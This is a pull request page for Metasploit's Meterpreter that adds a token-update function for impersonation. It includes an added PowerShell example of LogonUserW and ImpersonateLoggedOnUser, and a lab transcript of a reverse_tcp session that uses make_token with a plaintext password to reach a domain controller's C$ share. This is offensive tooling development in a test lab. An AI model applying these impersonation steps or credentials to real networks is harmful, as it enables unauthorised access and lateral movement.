Add update_token function to stdapi #648

Merged
merged 3 commits into from Jun 2, 2023
Conversation

Contributor

@salu90 salu90 commented May 24, 2023

This PR adds the request_sys_config_update_token function to the stdapi extension. We can use this function along with a token handle to update the security context of a Meterpreter session. This is achieved by:

  1. Applying the token to the current thread (via ImpersonateLoggedOnUser)
  2. Storing the token handle within remote->thread_token

Point 1 should be enough to cover impersonation for any command running from the session thread (command_process_inline). Since not all commands fall into this category, point 2 ensures Meterpreter has the token handle available for other tasks creating a new thread (command_process_thread) or a new process (request_sys_process_execute).

This addition comes in combination with rapid7/metasploit-framework#18022 made in the MSF repository, which contains the ruby-side code and an example module leveraging the new update_token functionality.
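As an added example that is not part of this PR, of Meterpreter or of the MSF module, the following PowerShell reproduces the two mechanisms the description relies on: a LOGON32_LOGON_NEW_CREDENTIALS logon applied to the calling thread with ImpersonateLoggedOnUser, and the fact that a freshly created thread runs under the process token rather than the caller's impersonation token, which is why the token handle has to be kept for command_process_thread and request_sys_process_execute. The account msflab.local\smcintyre and the share \\dc\C$ are taken from the test output on this page; the password is prompted for, and nothing else is assumed.

```powershell
# Added example (not Meterpreter/MSF code). Requires a Windows host and a reachable
# DC share; run in an elevated or non-elevated PowerShell, either works for
# NEW_CREDENTIALS because no local privilege is needed.

Add-Type -Namespace Win32 -Name Token -MemberDefinition @'
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool LogonUserW(string user, string domain, string password,
    int logonType, int logonProvider, out IntPtr token);

[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool ImpersonateLoggedOnUser(IntPtr token);

[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool RevertToSelf();

[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr handle);
'@

$LOGON32_LOGON_NEW_CREDENTIALS = 9   # same logon type the make_token module uses
$LOGON32_PROVIDER_WINNT50      = 3   # NEW_CREDENTIALS requires the WINNT50 provider

# Assumed identity and target (taken from the PR test output, not verified here).
$domain = 'msflab.local'
$user   = 'smcintyre'
$share  = '\\dc\C$'
$cred   = Get-Credential -UserName "$domain\$user" -Message 'Network credentials'
$pw     = $cred.GetNetworkCredential().Password

function Get-LastWin32Message {
    $code = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    (New-Object ComponentModel.Win32Exception($code)).Message
}

# Step 1 of the PR: obtain a token and apply it to the current thread.
$token = [IntPtr]::Zero
if (-not [Win32.Token]::LogonUserW($user, $domain, $pw,
        $LOGON32_LOGON_NEW_CREDENTIALS, $LOGON32_PROVIDER_WINNT50, [ref]$token)) {
    throw "LogonUserW failed: $(Get-LastWin32Message)"
}
[Win32.Token]::RevertToSelf() | Out-Null       # the module's rev2self step
if (-not [Win32.Token]::ImpersonateLoggedOnUser($token)) {
    throw "ImpersonateLoggedOnUser failed: $(Get-LastWin32Message)"
}

# Local identity is unchanged with NEW_CREDENTIALS (the module's getuid warning) ...
"Local identity on this thread : $([Security.Principal.WindowsIdentity]::GetCurrent().Name)"
# ... but outbound SMB from this thread now authenticates as the new user.
"Listing $share from the impersonating thread:"
Get-ChildItem $share -ErrorAction Stop | Select-Object -First 3 Name, LastWriteTime

# Why the PR also stores the handle (step 2): a new thread does not inherit the
# caller's impersonation token, it starts with the process token. Run the same
# listing on a runspace that is forced onto its own OS thread.
$rs = [runspacefactory]::CreateRunspace()
$rs.ThreadOptions = [Management.Automation.Runspaces.PSThreadOptions]::UseNewThread
$rs.Open()
$ps = [powershell]::Create()
$ps.Runspace = $rs
$null = $ps.AddScript({
    param($s)
    try   { "new thread: $((Get-ChildItem $s -ErrorAction Stop).Count) entries" }
    catch { "new thread: $($_.Exception.Message)" }   # expected: access denied, no token applied
}).AddArgument($share)
$ps.Invoke()
$ps.Dispose(); $rs.Dispose()

# Clean up: drop the impersonation and release the handle.
[Win32.Token]::RevertToSelf()  | Out-Null
[Win32.Token]::CloseHandle($token) | Out-Null
```

The second listing fails from the new thread even though the first one succeeded, which is exactly the gap the PR closes by keeping the handle in remote->thread_token so Meterpreter can apply it (SetThreadToken for a new thread, or a token-based process creation) instead of relying on the session thread's impersonation alone.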

Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Thanks for the changes and this submission! I tested it out with a Server 2019 instance and a couple of different logon types. Everything seems to be working as expected. As noted by the module some logon types will cause some API calls to fail, but I don't think there's anything to do about that.

I'll go ahead and get this landed. Thanks again!

Testing Output
msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.70:61682) at 2023-06-01 17:02:10 -0400
sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: MSFLAB\aliddle
meterpreter > sysinfo
Computer        : WINDOWS-11-VM
OS              : Windows 10 (10.0 Build 22621).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter > ls \\\\dc\\C$
[-] stdapi_fs_stat: Operation failed: Access is denied.
meterpreter > run post/windows/manage/make_token username=smcintyre password=Password2! domain=msflab.local

[*] Executing rev2self to revert any previous token impersonations
[*] Executing LogonUserA with the flag LOGON32_LOGON_NEW_CREDENTIALS to create a new security context for msflab.local\smcintyre
[*] Impersonating the new security context...
[+] The session should now run with the new security context!
[!] Remember that this will not have any effect on local actions (i.e. getuid will still show the original user)
meterpreter > getuid
Server username: MSFLAB\aliddle
meterpreter > ls \\\\dc\\C$
Listing: \\dc\C$
================

Mode              Size        Type  Last modified              Name
----              ----        ----  -------------              ----
040777/rwxrwxrwx  0           dir   2023-02-10 09:59:20 -0500  $Recycle.Bin
040777/rwxrwxrwx  0           dir   2022-08-05 15:16:50 -0400  Documents and Settings
040777/rwxrwxrwx  0           dir   2023-05-25 13:52:45 -0400  PerfLogs
040555/r-xr-xr-x  0           dir   2023-05-31 17:00:51 -0400  Program Files
040777/rwxrwxrwx  0           dir   2023-05-31 17:00:51 -0400  Program Files (x86)
040777/rwxrwxrwx  0           dir   2022-08-05 15:26:01 -0400  ProgramData
040777/rwxrwxrwx  0           dir   2022-08-05 15:16:50 -0400  Recovery
040777/rwxrwxrwx  0           dir   2023-02-10 12:53:39 -0500  System Volume Information
040555/r-xr-xr-x  0           dir   2023-02-10 09:59:14 -0500  Users
040777/rwxrwxrwx  0           dir   2023-05-30 08:36:40 -0400  Windows
100666/rw-rw-rw-  1342177280  fil   2023-06-01 08:37:35 -0400  pagefile.sys

meterpreter >
